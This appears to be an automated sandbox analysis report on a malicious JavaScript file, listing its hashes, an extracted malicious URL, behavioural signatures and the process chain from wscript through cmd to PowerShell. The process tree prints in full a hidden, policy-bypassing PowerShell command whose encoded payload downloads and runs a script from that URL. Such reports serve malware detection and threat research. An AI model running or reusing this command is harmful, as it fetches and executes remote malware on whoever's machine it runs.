Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
03-02-2024 02:14
Static task
static1
Behavioral task
behavioral1
Sample
8b213c8de60820649a9a15f042812510.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8b213c8de60820649a9a15f042812510.js
Resource
win10v2004-20231222-en
General
-
Target
8b213c8de60820649a9a15f042812510.js
-
Size
87KB
-
MD5
8b213c8de60820649a9a15f042812510
-
SHA1
e18bb318cd18516c09015f9cce8923be4f7921dc
-
SHA256
4b605b3c7ce9bf7d33bf114554a137bdf14330171fca524b68e39443f6806b38
-
SHA512
dbd7039a6e49b0a4714f09ca4a75a067b1784efc2a87124db71f2cee115880602bb53d180a17fd859835a92251d9f724ba8f59a63c0ec2bdd7b04128bb27a859
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/ot:59Ry98guHVBqqg2bcruzUHmLKeMMU7GL
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2744 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2744 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2156 wrote to memory of 2484 2156 wscript.exe 28 PID 2156 wrote to memory of 2484 2156 wscript.exe 28 PID 2156 wrote to memory of 2484 2156 wscript.exe 28 PID 2484 wrote to memory of 2744 2484 cmd.exe 30 PID 2484 wrote to memory of 2744 2484 cmd.exe 30 PID 2484 wrote to memory of 2744 2484 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\8b213c8de60820649a9a15f042812510.js1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-